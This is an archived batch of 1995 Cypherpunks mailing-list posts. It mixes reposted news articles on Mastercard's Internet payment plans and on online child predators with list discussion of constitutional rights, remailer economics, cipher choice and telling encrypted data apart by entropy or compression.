   Mastercard to Develop On-Line Standard 
 
 
   By Saul Hansell 
 
   Joining a stampede of companies that hope to profit from 
   shopping on computer networks, Mastercard International 
   said yesterday that it would develop standards for its 
   cards to be used on the Internet. 
 
   Mastercard, an association of banks that is based in New 
   York, said it would use the technology developed by the 
   Netscape Communications Corporation of Mountain View, 
   Calif., a specialist in software for the Internet, the 
   global web of computer networks. 
 
   The Internet allows a company to make information on its 
   products available to millions of computer users around the 
   world. Increasingly, companies would like to consummate 
   sales using the Internet as well, but the open nature of 
   the network may allow credit card numbers to be stolen. 
 
   "The problem with the Internet is there is no privacy and 
   no security," said Edward J. Hogan, a senior vice president 
   of Mastercard. 
 
   The Mastercard plan is one of several attempts to translate 
   credit card numbers into a code before they are sent to 
   merchants selling goods over the network and then on to the 
   credit card companies. 
 
   Visa International has said it will develop its own 
   encryption system with the Microsoft Corporation. Microsoft 
   has hinted that it may charge a fee for every transaction 
   using its system, though the details have not been 
   announced. Netscape and Mastercard say their transaction 
   standards will be openly published and free for other 
   companies to use. 
 
   Netscape's main business is selling software that allows 
   companies to publish information on the Internet. To expand 
   the market, it gives away or sells for a very small fee 
   software that allows people to view nformation on the 
   Internet. 
 
   The company has already included a component to encrypt 
   credit card numbers with its current version. The first 
   merchants to allow purchases using that feature will be 
   part of an electronic shopping service to be introduced by 
   the MCI Communications Corporation later this month. 
 
   The initial Netscape credit card system allows customers to 
   use any brand of card. It did not involve the cooperation 
   of credit card companies, but rather used existing rules 
   that related to mail and telephone card orders. 
 
   The agreement with Mastercard will for the first time allow 
   purchases on the Internet with automatic teller machine or 
   debit cards, which withdraw money from checking accounts. 
 
   Mastercard will likely agree to absorb the losses from 
   fraud on the system. Under the existing Netscape system, 
   merchants selling goods are liable if fraudulent card 
   numbers are used, as are companies that sell goods by mail 
   or telephone. 
 
   The debit card access and the fraud guarantee are expected 
   to be available by the fall. 
 
   End 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cactus@seabsd.hks.net (L. Todd Masco)
Date: Wed, 11 Jan 95 14:58:08 PST
To: cypherpunks@toad.com
Subject: Multiple symetric cyphers
Message-ID: <199501112303.SAA14726@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

One of the possible weaknesses in public-key messages is their dependence
upon a particular symetric cypher for the message with the session key
being contained in the block encrypted by the antisymetric cypher.  IE,
if a weakness in IDEA is discovered, it can be exploited against all PGP
messages.

I'm wondering: would the strength be increased by using a randomly selected
symetric cypher?  IE, as PGP uses IDEA and RIPEM uses DES/3DES, what if a
random cypher were selected from a set of cryptographically strong
symetric cyphers and information about the cypher selected were encrypted
in the RSA-encrypted block?

I guess this reduces to: do strong cyphers have "signatures" of some sort,
by which the type of encryption can be derived?  And if so, can this
"signature" be reduced by including part (eg, the first and last bytes)
of the ciphertext in the RSA block rather than the "clear" cyphertext block?

Just a thought,
- - --
Todd Masco     | "life without caution/ the only worth living / love for a man/
cactus@hks.net |  love for a woman/ love for the facts/ protectless" - A Rich
Cactus' Homepage

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLxQorxNhgovrPB7dAQF+HgP/b6RVkLS0vyjpVoHy1iF8IDgH1VFwci03
ZpD4tvQ+amZ3OLfMPNvM3jV3br6+/xVKax07yP0r26jbqV3T0RCNMzKLrQjnoyep
/h+DBNfboeU4BkhhJFIayLp0w+ykJRvzWoa72l4Uzos66Nu9n/spXwBbrGYD3awe
dUUr4YzLnhU=
=xON2
- -----END PGP SIGNATURE-----
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLxRjjSoZzwIn1bdtAQEt2gF/bnrL7r8CycdWz5H80DLpEFGRvDFy7zfF
OQQjnGTDmdSv+d3lQOfnqP7mKJJbyqo4
=QXEU
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 11 Jan 95 15:03:46 PST
To: cypherpunks@toad.com
Subject: Cybersmut
Message-ID: <199501112303.SAA14349@pipe1.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   New York Post, January 9, 1995 
   Front Page, pp. 8, 9. Four articles. 
 
 
   A Post Investigation 
 
   Computer Sickos Target Your Kids 
 
   Child-porn perverts roam info-highway 
 
   Furor Over Cybersmut 
 
   Molesters With a Modem 
 
   Kiddie-sex perverts using computers to lure victims 
 
 
   By Lou Lumenick and Kieran Crowley 
 
   City cops are about to start patrolling the information 
   superhighway to hunt down child pornographers and 
   pedophiles who are luring kids through high-tech computer 
   bulletin boards, The Post has learned. 
 
   "The bulletin boards are a total haven for pedophiles," 
   said Sgt. Richard Perrine, who's forming a new computer 
   investigation unit. 
 
   There are no names and faces, and a 33-year-old man can 
   pass himself off as a 10-year-old kid." Perrine said the 
   new unit, in the NYPD's Organized Crime Control Bureau, 
   plans to include computer child-pornographers and 
   pedophiles among its targets. 
 
   "We haven't really solidified our strategy yet," he told 
   The Post. 
 
   "This is something that's so new, law enforcement is not 
   quite ready for it." 
 
   Law-enforcement officials say pedophiles are lurking on the 
   nation's three major on-line services, America Online 
   Prodigy and Compuserve where kiddie-sex perverts are using computers 
   to lure victims -- as well as on the worldwide Internet, 
   smaller online services, and locally-operated computer 
   bulletin boards. 
 
   On-line services are an easy way for pedophiles to meet 
   children anonymously, noted Dyanne Greer, a senior lawyer 
   with the National Center for the Prosecution of Child 
   Abuse. 
 
   "Many cases are not reported, so I'm not sure anybody is 
   really aware how much this is going on," she said. 
 
   A Post probe uncovered these on-line horror stories: 
 
      Westchester computer expert George Telesha pretended to be 
      a 14-year-old girl on America Online and was quickly 
      besieged by perverts sending dirty pictures. 
 
      A Manhattan computer expert allegedly got a 13-year-old New 
      Jersey boy he met on-line to go skating with him. 
 
      Cops said the man lured the youth into the woods near the 
      boy's home and sexually abused him six times between last 
      July and September. 
 
      An unemployed Brooklyn computer programmer tried to 
      sodomize a Nevada teen-ager he met on a computer bulletin 
      board. 
 
      A 27-year-old computer engineer in Cupertino, Calif., 
      allegedly met a 14-year-old boy through America Online. 
 
      He is charged with handcuffing, shackling and blindfolding 
      the boy and then taking him to his apartment, where he 
      whipped him with a belt, shaved his pubic hair and had sex 
      with him. 
 
      California man sent pornographic photos via computer to a 
      teen-ager, then sought to have the teen killed to silence 
      him. 
 
   Such crimes are not easy to investigate or prosecute, 
   officials note. 
 
   "It's a bigger problem than most people realize," said Mike 
   Brick, director of the Orlando bureau of the Florida State 
   Office of Law Enforcement. 
 
   "There's a lot of people out there who want to have sex 
   with children. If they hang out at a real playground, a 
   teacher or someone might see them. In the computer 
   playground they can more or less hide in the bushes." 
 
   A handful of agencies have staffers pose as youngsters to 
   solicit dirty pictures and come-ons, but many don't have 
   the manpower, equipment or inclination to do so on a 
   regular basis. 
 
   And even if they did, experts say there's probably no way 
   to completely stop on-line perverts -- who constitute a 
   tiny fraction of overall on-line communicators -- short of 
   shutting down the services. 
 
   And that is not only unlikely, but would rob children and 
   others of a valuable educational resource. 
 
   The services say they're concerned -- but in no position to 
   play the role of police. 
 
   AOL spokeswoman Pam McGraw said computer-privacy laws keep 
   her company's hands tied when it comes to the 
   person-to-person type of communication in which porn can be 
   exchanged in electronic "private chat rooms." 
 
   "Federal law prevents us from monitoring E-mail," McGraw 
   said. "We do our best to prevent misuse of our service." 
 
   She urged AOL customers to report offensive communications 
   -- which are prohibited under company rules -- so the 
   company can warn offenders or eject them from the system. 
 
   Law-enforcement officials say on-line companies are quick 
   to cut off perverts and help track down and prosecute 
   pedophiles and pornographers. 
 
   But the crimes still flourish because computers make life 
   simpler for the perverts. 
 
   Pedophiles can easily pretend to be a child online, or even 
   someone of the opposite sex, to help draw a child into a 
   trap. And they can elude detection by using false names and 
   post office boxes. 
 
   "Offenders can say they're other kids, then arrange for 
   face-to-face meetings," Greer said. "It's pretty scary when 
   you find out you're dealing with a 47-year-old man instead 
   of the 14-year-old you expected." 
 
   Greer said some pedophiles have convinced children to pose 
   for pornographic pictures. The pedophiles then trade the 
   pictures with other perverts, or use the pictures to draw 
   in other kids "and break down their inhibitions," she said. 
 
   End Article 1 
 
 
   Article 2 
 
   Photo: 
   CREEP CATCHERS: Special agent Mike Brick (white shirt) of 
   the Florida state police and another agent track a 
   pedophile on the computer. 
 
   How to protect your children 
 
   Steps parents can take to stop on-line pedophiles 
 
   By Lou Lumenick 
 
   Parents must take the offensive to protect their children 
   from on-line perverts, experts say. 
 
   "You wouldn't let a young child hang out in a playground or 
   mall alone, so don't let them hang out in the computer 
   playground by themselves," said Mike Brick of the Florida 
   Department of Law Enforcement. "You need to exercise the 
   same caution." 
 
   So what can a parent do? First of all, experts say talk 
   with someone at your on-line system -- whether it's America 
   Online, Prodigy, Compuserve, Genie Delphi or one of the 
   others. 
 
   All of them allow users to limit access by children. 
 
   Subscribers to America Online, for instance, can bar their 
   children from the private "chat rooms," where the more 
   sexually explicit conversations take place. 
 
   Most services will also allow you to disable one-on-one 
   conversations when your child logs on. 
 
   Then talk with your children. 
 
   Rule No. 1 is that they must never ever give their real 
   name, address or telephone number to anyone on-line. 
 
   Rule No. 2 is that they must never ever agree to meet with 
   anyone they encounter on-line -- even if he says he's a kid 
   the same age who lives across the street. He could very 
   well be an adult willing to travel hundreds of miles for a 
   sexual encounter. 
 
   Beyond that, it's a matter of parental vigilance. 
 
   "Make the kids teach you how to use the computer," said 
   Dyanne Greer, a senior lawyer with the National Center for 
   the Prosecution of Child Abuse. 
 
   "Many parents take the attitude, 'Gee, my kids are learning 
   a skill.' That's very true, but you can't be left behind or 
   you won't know what's going on. 
 
   Many experts recommend moving the computer out of the kids' 
   bedroom into a more central place -- like the living room 
   -- so parents can keep a closer eye on things. 
 
   "If your kid wants to put the computer in his bedroom 
   closet, I would be very nervous," Brick said. 
 
   "If you find your children spending a lot of time on the 
   service, you need to pay attention. "If every time you walk 
   into the room, the screen goes dark, check it out. It could 
   be the modern equivalent of kids under the cover with a 
   flashlight reading Uncle Harry's Playboy magazine. Or 
   worse." 
 
   Brick said telltale signs of porn being downloaded include: 
 
   "If you have a 100-megabyte drive and it's always full and 
   the kids are demanding more memory. Photos can take a lot 
   of memory. " 
 
   "If you find floppy disks hidden around the house." 
 
   "If you need help playing them or figuring out whether 
   there's a problem, go to your local police department. Most 
   will be happy to help." 
 
   End Article 2 
 
 
   Article 3 
 
   Chilling messages made dad take action 
 
   By Kieran Crowley 
 
   George Telesha couldn't believe his ears. Or his modem. 
 
   Telesha, 46, a bank computer specialist and president of 
   the Westchester chapter of the Fathers Rights Association, 
   heard from several dads that their kids were accessing porn 
   on their home computers. 
 
   So he decided to take a walk on the wild side -- on the 
   information superhighway. 
 
   Telesha, the father of two, pretended to be a 14-year-old 
   girl named "Suzy" on an America Online computer bulletin 
   board. 
 
   He said he was besieged with perverts who sent dirty 
   pictures. 
 
   Telesha said several men sent "Suzy" porno pictures, tried 
   to get her address and phone number -- and tried to lure 
   her out of her home. 
 
   "Can I come up to New York?" one out-of-state man said. 
   "Can I meet you? You don't have to tell your parents." 
 
   When "Suzy" mentioned her parents were not home, another 
   man became very insistent, Telesha said. 
 
   "I live in New York. Can I come over? I'll take you 
   shopping," the man messaged "Suzy" in trying to set up a 
   date at a local mall. 
 
   One man said he lived in New Jersey and invited "Suzy" over 
   for a photo session. 
 
   Telesha said his most disturbing exchange was with a man 
   who sent child sex pictures. 
 
   "Do you have any more of these?" Telesha asked. 
 
   "Usually, it's just one session," the man typed back. 
 
   "That sent chills through me," said Telesha, fearing the 
   photographed children may have been harmed. 
 
   "It's mind-boggling. I haven't slept in a week. What 
   happened to the children in these pictures? What is going 
   to happen to them?" 
 
   One AOL subscriber even offered hints on how to pick up 
   young girls and take pornographic pictures of them Telesha 
   said. 
 
   "I think people ought to know what's going on. I just want 
   to see it stopped," he said. 
 
   End Article 3 
 
 
   [Article 4 reports on exchanges between Telesha 
   masquerading as three different girls and AOL subscribers.  
   Too disgusting to post.  Censorship imposed for lurking 
   kiddies.] 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: root <root@einstein.ssz.com>
Date: Wed, 11 Jan 95 16:41:14 PST
To: pstemari@erinet.com (Paul J. Ste. Marie)
Subject: Re: Pornography, What is it?
In-Reply-To: <9501112356.AA02726@eri.erinet.com>
Message-ID: <199501120029.SAA00164@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text


> 
> At 11:33 PM 1/10/95, Timothy C. May wrote:
> > ... I'm  not a lawyer, and it's been 25 years since I was in a "civics"
> >class, so I'm sorry to not recall the precise language by which
> >"Congress shall make no law" also is taken to apply to Sacramento,
> >Albany, Austin, and so forth.
> 
> The 14th Amendment extended the restrictions that the Bill of Rights place 
> on the Federal Gov't to the state gov'ts.
>  
> 
>     --Paul J. Ste. Marie
>       pstemari@well.sf.ca.us, pstemari@erinet.com
> 
Article XIV (1868)

Sec. 1.

All persons  born or naturalized in the United States, and subject to the 
jurisdiction thereof, are citizens of the United States and of the States
wherein they reside. No state shall make or enforce any law which shall
abridge the privileges or immunities of citizens of the United States;
nor shall any State deprive any person of life, liberty, or property,
without due process of law; nor deny to any person within its jurisdiction
the equal protection of the laws.

Where in there is the protection you speak of? I see no guarantee of my 
Constitutional rights, only of privileges and immunities as granted
by the federal government. 

The 1st Amendment say:

Article 1 (1791)

Congress shall make no law respecting an establishment of religion, or 
prohibiting the free exercise thereof; or abridging the freedom of speech,
or of the press; or the right of the people to assemble, and to petition
the government for a redress of greivances.

Lets examine the first part of this article. Since Congress is prohibited 
from making any law (ie no law) respecting religion it follows they don't
even get the opportunity to define religion. When one considers the Supreme
Courts view of Rastafarians, Coptics, and the Native American Church it is 
clear they are making laws respecting an establishment of religion. It is
also clear they are prohibiting the free exercise thereof as well.

The attacks on freedom of speech are quite clear and I won't go into them.

The last part is quite irrelevant since as citizens we can't even sue the
government in civil court without first getting its permission. Not what
I would call supporting our rights to redress of greivances.

Article IV (1791)

The right of the people to be secure in their persons, houses, papers, and 
effects, against unreasonable searches and seizures, shall not be violated,
and no warrants shall issue, but upon probable cause, supported by oath
or affirmation, and particularly describing the place to be searched, and 
the persons or things to be seized.

Have you ever heard of the DoJ Forfeiture Super Fund?

Why do courts allow law enforcement to act upon anonymous tips when no 
oath or affirmation is given in such a case? 

Article V (1791)

No person shall be held to answer for a capital, or otherwise infamous crime,
unless on a presentment or indictment of a grand jury, except in cases 
arising in the land or naval forces, or in the militia, when in actual service
in time of war or public danger; nor shall any person be subject for the    
same offence to be twice put in jeopardy of life or limb; nor shall be
compelled in any criminal case to be a witness against himself, nor deprived
of life, liberty, or property, without due process of law; nor shall private
propety be taken for public use, without just compensation.

The last sentence is the most commenly broken aspect of this amendment.

A strong case could be made that breathalyzer, blood tests, and such also
violate the spirit and letter of this article.

Article VI (1791)

In all criminal procecutions, the accused shall enjoy the right to a speedy
and public trial, by an impartial jury of the State and district wherein the
crime shall have been committed, which district shall have been previously 
ascertained by law, and to be informed of the nature and cause of the 
accusation; to be confronted with the witnesses against him; to have
compulsory process for obtaining witnesses in his favor, and to have the
assisstance of counsel for his defence.

Seems to me that according to this anonymouse witnesses should not be allowed
in any case. Since he also has a right to a public trial the court does not
have the power to exclude the press or public. 

Article IX (1791)

The enumeration in the Constitution, of certain rights shall not be construed
to deny or disparage others retained by the people.

This article states quite clearly and simply that if there is any doubt as
to whether it is a right the resolution shall be found in favor of the people.

Article X (1791)

The powers not delegated to the United States by the Constitution, nor 
prohibited by it to the States, are reserved to the States, or to the people.

This article states clearly that if it isn't in this document the federal 
government has no claim to it. The only way they may get such powers is
through due process, namely constitutional amendments.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. McCarthy" <lmccarth@ducie.cs.umass.edu>
Date: Wed, 11 Jan 95 15:50:04 PST
To: cypherpunks@toad.com
Subject: Re: Remailer traffic loads?
Message-ID: <199501112355.SAA15222@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

> Is there someplace that remailer operators routinely post information
> about traffic load?

Remailers operating Matt Ghio's or Lance Cottrell's software should autoreply
to a message with "Subject: remailer-stats" with a bar chart indicating the
number of messages remailed in each of the past 24 hours.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLxRvwioZzwIn1bdtAQFdEQF/dTXM3ii1pAHUV108kMx8N3urhv/HAHQc
IZHLEqfOcNTDaV6ZrDxuT+0AZzhdu8rL
=ZKwP
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pstemari@erinet.com (Paul J. Ste. Marie)
Date: Wed, 11 Jan 95 16:11:43 PST
To: root@einstein.ssz.com (root)
Subject: Re: Pornography, What is it?
Message-ID: <9501112356.AA02726@eri.erinet.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:33 PM 1/10/95, Timothy C. May wrote:
> ... I'm  not a lawyer, and it's been 25 years since I was in a "civics"
>class, so I'm sorry to not recall the precise language by which
>"Congress shall make no law" also is taken to apply to Sacramento,
>Albany, Austin, and so forth.

The 14th Amendment extended the restrictions that the Bill of Rights place 
on the Federal Gov't to the state gov'ts.
 

    --Paul J. Ste. Marie
      pstemari@well.sf.ca.us, pstemari@erinet.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pstemari@erinet.com (Paul J. Ste. Marie)
Date: Wed, 11 Jan 95 16:06:04 PST
To: John Draper <cypherpunks@toad.com
Subject: Re: Getting on the list
Message-ID: <9501112357.AB02726@eri.erinet.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:55 AM 1/11/95 -0800, John Draper wrote:
> ... I tried the usual request to cypherpunks-request@toad.com,   but haven't
>been sucessful.
>
>Who is maintaining the list these days?   Does it still exist?  And
>why haven't any of my requests been hohored?

Cypherpunks uses the majordomo software.  Try sending a message to 
majordomo@toad.com containing the following two lines:

help
subscribe cypherpunks

    --Paul J. Ste. Marie
      pstemari@well.sf.ca.us, pstemari@erinet.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mccoy@io.com (Jim McCoy)
Date: Wed, 11 Jan 95 17:00:07 PST
To: cypherpunks@toad.com
Subject: Re: Storm Signals
In-Reply-To: <199501112337.PAA20199@jobe.shell.portal.com>
Message-ID: <199501120100.TAA16301@pentagon.io.com>
MIME-Version: 1.0
Content-Type: text/plain


From some anonymous dude:
> > 
> > Military action also requires political will, and with the recent change
> > in power in the US govt there is no way anything is going to happen for at
> > least six months.  Freshmen congressmen do not sign off on a war the first
> 
> 
> True.  But clandestine operations don't require the approval of 
> Congress.  In fact, the prez never has to admit they exist.  Ever.  Read 
> the Pentagon Papers.

The president needs the approval of the ranking members of the Senate
Intelligence Oversight committee (I think that is the one), and there is at
least one republican among them...  Anyway, several thousand Green Berets
does not a clandestine operation make.  Secret wars are a bitch to pull
off, and with a president with the lack of backbone such as Clinton they
are not going to happen in the next two years.

jim




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Draper <crunch@well.sf.ca.us>
Date: Wed, 11 Jan 95 19:17:34 PST
To: cypherpunks@toad.com
Subject: Finally got on
Message-ID: <199501120317.TAA07919@well.sf.ca.us>
MIME-Version: 1.0
Content-Type: text/plain


I finally got on...   I actually didn't get that swamped,  but certainly I
couldn't
be expected to know that cypherpunks-request was defunkt.    Oh well.    Now
that
I'm on,    I was wondering if anyone would let me know the status of Phil
Zimmerman's
case,  and where I can xtract any info.     I've heard reports that the
Govt.  was
planning to press charges.     Just getting back on here again,    I'm not
in the
know of these things,    but can now handle large amounts of mail.   I'm
also
interested in knowing how I can help in Phil's defence case.    Where do
people
mail checks to Phil's defence fund?

Anyway,   glad to be back up here again....    And a big fat HAPPY NEW YEAR
to
all of you Cypherpunk folks!!  And Oh Yea!!   Hi Brad,  glad to make your 
acquaintence...    Yup!  The WELL was sure hosed today....    I'm just now
getting
mail thats backed up now for the 4 days I've been without power.

There is ONE disadvantage of living out in the country....    Power can be a
tad 
flakey.     We've just got our power turned on today....  Yay!!!   When I
returned
from MacWorld,   things were really dark up here.   :-)

Cheers
C. Crunch

PS = Scuse the formatting,   I STILL cannot get Microphone to not
automatically
word wrap.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Wed, 11 Jan 95 19:55:31 PST
To: marko@millcomm.com (Mark Oeltjenbruns)
Subject: Re: How do I know if its encrypted?
In-Reply-To: <m0rSFsb-000kfuC@mill2.millcomm.com>
Message-ID: <199501120337.TAA13574@netcom6.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Mark Oeltjenbruns wrote:

>         I keep seeing the idea that to keep out of trouble remailers and
> Data Havens should require that data be encrypted before it is accecpted.
> My question is how do I know it is encrypted?  If I say that anyone sending
> me data to be massaged by my system must first encrypt it, how do I know
> they are in fact complying with that request?  After all this is the area
> for the paranoid's to hang out in.

> (1) Look at the incomming data, which of course would be impractical and
> defeat the whole idea.

Actually, no. If the remailed material is encrypted, then looking at
it is harmless. (And if it is not....) The "ideal mix" neither looks
at nor keeps records about remailed items, of course. The "nonideal
mix" may easily insist on encryption.

I won't go through the rest of the points here, but there's a key word
here: entropy. Get familiar with it now (and not just 50 years from
now, when the worms and the bacteria will be giving lectures).

Abstractly, it is not possible to ever prove that a file is either
encrypted or unencrypted. Practically, encrypted files have high
entropy per character (characters appear with approximately equal
frequency), while unencrypted files have relatively low entropy,
reflecting the patterns and n-tuple clusterings in ordinary languages.

Sophisticated entropy measures are available, and have been discussed
here. But there's an easier approach: try to compress the file.

An encrypted ( = high entropy) file will generally not compress, and
may even expand in size. An ordinary message in English or Dutch or
whatever, such as this one, will compress significantly, to perhaps
half it's uncompressed size. (Quibblers, this is the place where your
announce the precise compression seen...)

--Tim May


-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@hawksbill.sprintmrn.com (Paul Ferguson)
Date: Wed, 11 Jan 95 16:47:14 PST
To: jya@pipeline.com (John Young)
Subject: Re: Internet World on Net Security
In-Reply-To: <199501112240.RAA11895@pipe1.pipeline.com>
Message-ID: <9501120046.AA25595@hawksbill.sprintmrn.com>
MIME-Version: 1.0
Content-Type: text



> 
> The entire issue of Internet World of February, 1995, is about Internet
> security, digital cash, encryption, firewalls and more.  Here's the
> contents: 
>  

Most of them were _very_ cursory, geared more towards the neophyte.
In fact, some of them were actually misleading, especially the
article on firewalls.

- paul


_______________________________________________________________________________
Paul Ferguson                         
US Sprint                                          tel: 703.689.6828
Managed Network Engineering                   internet: paul@hawk.sprintmrn.com
Reston, Virginia  USA                             http://www.sprintmrn.com 



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Wed, 11 Jan 95 20:51:57 PST
To: cypherpunks@toad.com
Subject: Re: How do I know if its encrypted?
In-Reply-To: <m0rSFsb-000kfuC@mill2.millcomm.com>
Message-ID: <199501120450.UAA29781@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   My question is how do I know it is encrypted?  

Calculate an entropy measure of some sort.  Entropy is a measure of
disributional skew.  Maximum entropy means minimum skew.

For human-readable text of any sort, the monogram entropy, i.e. the
entropy of individual characters, will _always_ be detectably less
than maximal.  Encrypted text will always be near maximal.  The two
are easy to distinguish.  ASCII-armored encrypted text will always be
right at 6 bits per byte.

For speed of implementation, you don't need even to look at much text.
You can get a statistically significant measure quite quickly from the
first couple of kilobytes.  

And since you're only really worried about detecting non-randomness,
you don't even need to calculate the exact entropy but rather an
approximation of it.  This approximation can be done with entirely
fixed point arithmetic, if you're a bit clever about it.

A practical system would cut out a notch at 6/8 for ASCII armor, which
would make approximation techniques a bit tricky.  More practical is
just to detect ASCII armor with a regular expression recognizer and
de-armor it before the entropy check.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Wed, 11 Jan 95 20:57:42 PST
To: cypherpunks@toad.com
Subject: Re: Remailing pricing and cover traffic
In-Reply-To: <199501120004.QAA24479@jobe.shell.portal.com>
Message-ID: <199501120456.UAA29793@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: Pierre Uszynski <pierre@shell.portal.com>

   Let me try to deal with the first
   two to conclude that many professionally run remailers may very well
   stay free or close to that for a long time:

[summary: cross-subsidies for hiding another businesses]

Cross-subsidies are common in other industries, why not in privacy
provision?  No particular reason why that won't happen.

Nevertheless, the remailer is getting paid for one way or another.  In
addition, virtual link encryptors to some other commercial remailer
may be a better way of providing cover traffic.

It is refreshing, though, to see thoughtful discussion about alternate
economic arrangements.  The twin requirements of supporting the
physical remailer and preventing swamping do not immediately and
necessarily lead to pay-per-use.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Wed, 11 Jan 95 21:04:05 PST
To: cypherpunks@toad.com
Subject: Re: Multiple symetric cyphers
In-Reply-To: <199501112303.SAA14726@bb.hks.net>
Message-ID: <199501120502.VAA29808@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: cactus@seabsd.hks.net (L. Todd Masco)


   I'm wondering: would the strength be increased by using a randomly selected
   symetric cypher? 

Strength is not right aspect.  Global risk is reduced, simply because
the aggregate cost of a breach is reduced.

But selecting a single cipher is just as much a fixed policy as a
randomly selected one is.  Far better to let the user pick a policy,
both about sent and accepted ciphers.

   I guess this reduces to: do strong cyphers have "signatures" of some sort,
   by which the type of encryption can be derived? 

If they do, they're likely not _strong_ ciphers.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: marko@millcomm.com (Mark Oeltjenbruns)
Date: Wed, 11 Jan 95 19:05:20 PST
To: cypherpunks@toad.com
Subject: How do I know if its encrypted?
Message-ID: <m0rSFsb-000kfuC@mill2.millcomm.com>
MIME-Version: 1.0
Content-Type: text/plain


        I keep seeing the idea that to keep out of trouble remailers and
Data Havens should require that data be encrypted before it is accecpted.
My question is how do I know it is encrypted?  If I say that anyone sending
me data to be massaged by my system must first encrypt it, how do I know
they are in fact complying with that request?  After all this is the area
for the paranoid's to hang out in.

        I see some possible options.  Most don't seem to workable.  I could ...
(1) Look at the incomming data, which of course would be impractical and
defeat the whole idea.
(2) Force them to pgp it, but that could be defeated by having enough of a
pgp sig. that my system is fooled.  Not to mention they must use *MY* idea
of what good encryption is.  After all I could say you must use my
encryption software that has a backdoor I know of, i.e. clipper, or that
costs money and can only be bought from me.  This last point would be one
way of making sure you made some money, but does seem impractial.
(3) Peform a histogram analysis on it, if it doesn't pass a certain
threshold reject the whole thing.  Although cute, I don't like this one.
(4) Encrypt it with my own key and decrypt it before squirting it back out.
This doesn't seem to gain me anything though since it could be said that I
still have the ability to look at the data.
(5) Only acecpt data from a remailer or other service that would be
guranteed to be encrypted.  This seems like it would lead to a 'good ole
boy' network that could exclude service providers it doesn't like.
etc. etc.

        Whos to say that the data isn't encrypted?  I could be hidding a
real message in that eagale spread of a porn picture.  'Simple, don't allow
porn but only accecpted images.'  Well that certainly sounds like a can of
worms waiting to squirm around your toes.

        Is the question of what is encrypted data similar to what material
is porn or some other 'evil' data?   Am I missing something in this simple
requirment of  only dealing with encrypted data?  Or am I simply blowing
something way out of proportion?

-Mark
----------
Mark Oeltjenbruns  marko@Millcomm.com   N0CCQ
SnipIt Research    Finger for PGP key.
'My other key is 2048 bits.'





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Wed, 11 Jan 95 21:07:27 PST
To: cypherpunks@toad.com
Subject: Re: Why use plastic for remailers and DH?
In-Reply-To: <Pine.3.89.9501102139.A36230-0100000@aix1.uottawa.ca>
Message-ID: <199501120505.VAA29815@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: Angus Patterson <s675570@aix1.uottawa.ca>

   This point may have been raised before, but anyway, unless you're using a 
   swiss-bank issued credit card [etc. ...], why would anybody want to use 
   something as completely traceable as a credit card to pay for a remailer 
   or a data haven?

Because not everyone needs paranoid levels of security.

Just because the truly paranoid won't use a service doesn't make it
useless.  Vebum sapienti...

Eric





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@netcom.com>
Date: Wed, 11 Jan 95 21:29:13 PST
To: Mark Oeltjenbruns <marko@millcomm.com>
Subject: Re: How do I know if its encrypted?
In-Reply-To: <m0rSFsb-000kfuC@mill2.millcomm.com>
Message-ID: <Pine.3.89.9501112015.A12481-0100000@netcom8>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 11 Jan 1995, Mark Oeltjenbruns wrote:
> (3) Peform a histogram analysis on it, if it doesn't pass a certain
> threshold reject the whole thing.  Although cute, I don't like this one.

Why not -- sounds cool to me.   It is also very fast, and does not
take much programming.

